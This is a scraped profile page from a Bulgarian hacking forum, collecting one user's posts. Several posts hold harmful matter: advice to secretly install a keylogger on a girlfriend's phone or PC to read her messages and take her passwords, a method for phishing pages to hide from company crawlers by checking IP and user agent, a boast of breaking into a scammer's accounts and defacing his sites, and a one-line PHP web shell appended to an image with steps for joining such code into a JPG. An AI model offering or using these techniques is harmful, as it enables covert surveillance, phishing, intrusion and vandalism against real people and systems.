Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

TheZero

Потребители
  • Мнения

    15
  • Присъединил/а се

  • Последно посещение

  • Days Won

    4

TheZero last won the day on Септември 17

TheZero had the most liked content!

Обществена Репутация

9 Neutral

1 Последовател

Относно TheZero

  • Ранг
    Начинаещ

Последни посетители

239 профилни разглеждания
  1. TheZero

    DefCamp 2018 Bucharest

    until

    I'm neither a specialist nor a programmer. I've no idea what the benefits of such conferences are. I wish success to "professionals"!
  2. Щом ти е приятелка, демек можеш да седнеш на PC-то или да чувъркнеш в телефона й. Най-добре е да й инсталираш шпионски софтуер/keylogger. Става за една секунда. Така ще можеш да четеш какво си пише не само в фейса но и на всякъде. Ще й получиш и всички паролки. Стана абв-то доста се стегнаха - недей така! А бе прав си! Все още си имам предубежденията.
  3. TheZero

    Cookie Based SQL İnjection

    Уязвимоста не е чак забравена. Намират се разни измислени системки да си изплюват дб-то чрез манипулация на кукенцата. Леко извън темата е но бъркането вътре в бисквитите може да послужи и за LFI, когато /proc/self/environ, access_log, error_log и там подобни не пробачкат. Чрез промяна на параметрите на url-то доста често кукитата се презаписват с различно съдържание. Един зловредно изменен линк изпратен на жертвата, може да инжектира html/javascript код в броузера и от там да се стигне до поразии като XSS или CSRF.
  4. TheZero

    Как да скриете файловете си в снимка

    cat file.jpg file.zip > novfail.jpg
  5. TheZero

    CEHv9 Certified Ethical Hacking ...

    С такива обучения, курсове, мурсове, знаеш ли кога ще научиш нещо? - На куково лято.
  6. Никъде не съм споменал за referer spoofing, а и е безсмислено в случая. На ботовете това им е работата да обикалят страници. Phishing страниците по природа след submit-ването на формата пренасочват към реалната страница и форма. Подаденият referer си е реален и ботът тръгва по обратен път и ако открие нередности си изпълнява задължението да запише страницата в черния списък. Другият вариант е, някой да се оплаче, репортне phishing-а. В този случай също проверяващият ще е робот, а не жив човек. Та както и да е. В големите компани бачкат стотици секюрити експерти и глупави пробиви като от преди 5-10 години вече не стават.
  7. От доста време не само Gmail a повечето, да не кажа всички глобални платформи, като Facebook, Yahoo, Outlook и т.н са се погрижили много сериозно върху сигурноста на потребителите си. Все пак обаче, софтуерът е далеч от човешката догадливост (все още) и мерките могат да бъдат прескочени. Ако друг знае (е снифнал), User Agent, Screen Resolution, Time Zone, IP Address - range, geolocation, без особени затруднения, освен IP частта, може да симулира устройството на собственика. Гореизброените могат да се научат с няколко реда код заедно с user/pass примерно в една измамна login форма. Компаниите са взели мерки и срещу fake и phishing страниците. След като получат посещение отвън, техен паяк посещава източника на referer-а за проверка. Ако се открие нередност, фалшивата страница попада в общ черен списък на почти всички компании и съответно потребителите получват очебийни предупреждения да не посещават тези места и да внимават какво правят. Нека ви разкрия е една малка тайна! В злонамерените страници се вгражда код, проверяващ IP и User agent, ако Reverse IP и браузър инфото съдържат примерно стринг - facebook, това ще рече, че посетителят е истински робот на facebook, a точно от него трябва да се скрие съдържанието. Тогава вместо измамната логин форма се сервира съвсем друго съдържание с цел да се заблуди паяка. Методът дали работи в момента? Последно съм експериментирал пред около година и нещо и си беше OK. Предполагам, че все още е така.
  8. Това са група измамници обещаващи светло бъдеще и кариера на деца и възрастни като манекени, модели и филмови звезди. Жертвите ги набират от реклами във facebook и разбира се всеки кандидат регистрирал се в многобройните им сайтове бива "одобрен". За целта трябва да заплати само еди колко си лева и да получи една хартия като техен уж член. На клъвналите им се искат и още пари за снимки. След това още и пак още, до където могат. Лошото е, че изманците постоянно си регистрират фирми и един вид са легални мошеници. Баш тарторът им е накъв си пловдивчанин, Ахмед - притежаващ и титлата - "мис травестит - България". Познайник е на полицията за всякакви подлости и гнусотии. Та имах основателен повод (не ме е мамил лично), да му създам главоболия и щети. С малко фантазия му "гръмнах" паролите. Видях, че в сървъра му има много "бизнес" сайтове, както на български, така и на румънски и турски. Личната му поща в абв.бг я сварих пълна с неприлични снимки и кореспонденции. С удоволстиие обезобразих сайтовете му няколко пъти, след като се убеждавах, че отново е пуснал реклама и пак ще го мога да го ощетя финансово. Убеден съм, че успях да му разваля сънищата и да го накарам да загуби поне част от парите, които е отнел с лъжа от невинните хора. Знам, че форумът е за етично хакерство, и за мене е много етично, това което направих. Ето и моментен изглед на един от сайтовете му: http://zonehmirrors.org/defaced/2014/09/21/www.ffsofia.com/www.ffsofia.com/
  9. Някъде бях чел преди, че ползвали криенето на файл във файл за нелегални неща. Като се замисля, шпионажът може да е станал доста по-лесен. 🤥 Имаше един код за batch (bat) файл за скрита папка, където може да си криеш разни неща. Не е кой знае сигурно, но за това пък е просто. Google > hide folder batch
  10. TheZero

    Кой, къде и какво работи?

    Споделяй личната си информация само ако е много-необходимо! Не издавай тайните си на втори човек, защото тайната вече не е тайна! Не спазваш ли максимата, всичко рано или късно се обръща в твоя вреда. Edited by: nuclear bomb. Като не искаш да дадеш лична информация, защо тогава пишеш ? Да не се повтаря.
  11. На теория сценарият е възможен но практически е неразумен. При положение, че има много различни начини да се източват и крадат пари в интернет, които крият по-малко рискове, дори понякога и по-високи суми, това го намирам казано направо за глупаво. Разбира се, може и да не е така, а аз да не знам същноста на нещата, и глупоста да е в моето мнение. И все пак, ако някой е "разработил" такава схема за мене е начинаещ кибер престъпник със слаба фантазия. От там и вероятноста да сгафи е доста голяма.
  12. Аз съм много любопитен на тема "хакерство". След като разбрах от тука за съществуването на въпросният хакерски университет, реших да го посетя и да почерпя от богатият опит на майсторите. Щракнах скрийнчета на университета и отделно на сайта им - STR Security. http://ehu.bg https://str-security.com Много як дизайн, да. А има ли още други подобни университети, факултети, академии?
  13. TheZero

    "Етично хакерство"

    "To hack", означава чупя, режа, блъскам, взломявам... Долу-горе същият смисъл има и жаргонната "нахаквам" (незнайно, как попаднала в българкият език). Както и да се извърта, точно така го разбира и мнозинството. Котката си гони мишките и ако успее ги лови. Това "етично" ли е, или не е?!!! - Зависи за коя от двете страни, нали?!!! Ta след малкото риторика - Както и да погледна (като котка или мишка), май няма нито една тема във форума съвпадаща със замисъла му. Ех, може и аз да не съм забелязал. Прав е @freeman987, само едни разтягания на "философски локуми" с резултат едно към гьотере.
  14. Използвах твоя аватар и най отдолу добавих: <?system($_GET[cmd]);?> С други думи d3k4z.png е снимка, която може да изпълнява команди при подходящи условия.
  15. Търси File Joiner в Google! Аз лично ползвам Simple File Joiner. Първо избираш снимката, която ще се вижда, а на вторият ред файлът с PHP кода. Запази полученото като snimka.jpg и си готов
×

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.